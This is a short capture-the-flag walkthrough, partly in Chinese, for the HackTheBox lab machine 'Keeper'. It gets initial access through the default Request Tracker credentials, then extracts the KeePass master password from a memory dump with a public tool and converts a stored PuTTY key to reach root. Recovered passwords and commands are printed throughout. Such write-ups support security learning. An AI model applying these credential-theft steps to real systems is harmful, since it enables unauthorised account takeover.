# Keeper ## 1.nmap scan  ``` sudo vim /etc/hosts 10.10.11.227 tickets.keeper.htb ``` Search for request tracker default username password (or RT 4.4.4 default) ``` root:password ``` admin/user/select/lnorgaard New user. Initial password set to Welcome2023!  ## 2.ssh login ``` ssh lnorgaard@10.10.11.227 ls -la cat user.txt (flag1) unzip RT30000.zip (KeePassDumpFull.dmp passcodes.kdbx) ``` search for keepass dmp [kali] git clone https://github.com/vdohney/keepass-password-dumper #文件傳輸(netcat(nc).scp...) ``` scp lnorgaard@10.129.122.221:~/RT30000.zip . ``` 查看github readme.md執行指令 ``` vim keepass_password_dumper.csproj (dotnet版本改6) ``` ``` dotnet run KeePassDumpFull.dmp(PATH_TO_DUMP) ```  dump下來發現字串：rødgrød med fløde (奶油紅粥-丹麥文) ## 3.puttygen ssh key [kali] Search "kdbx how to open" keepass2 open file passcodes.kdbx password:rødgrød med fløde  取得root密碼F4><3K0nd! Search "PuTTY-User-Key-File-3" puttygen Search "kali puttygen ssh key" https://www.ssh.com/academy/ssh/putty/linux/puttygen 複製notes全部內容在[file].ppk  ``` puttygen putty.ppk -O private-openssh -o id_rsa ``` ``` ssh root@10.10.11.227 -i id_rsa ```  cat root.txt (flag2)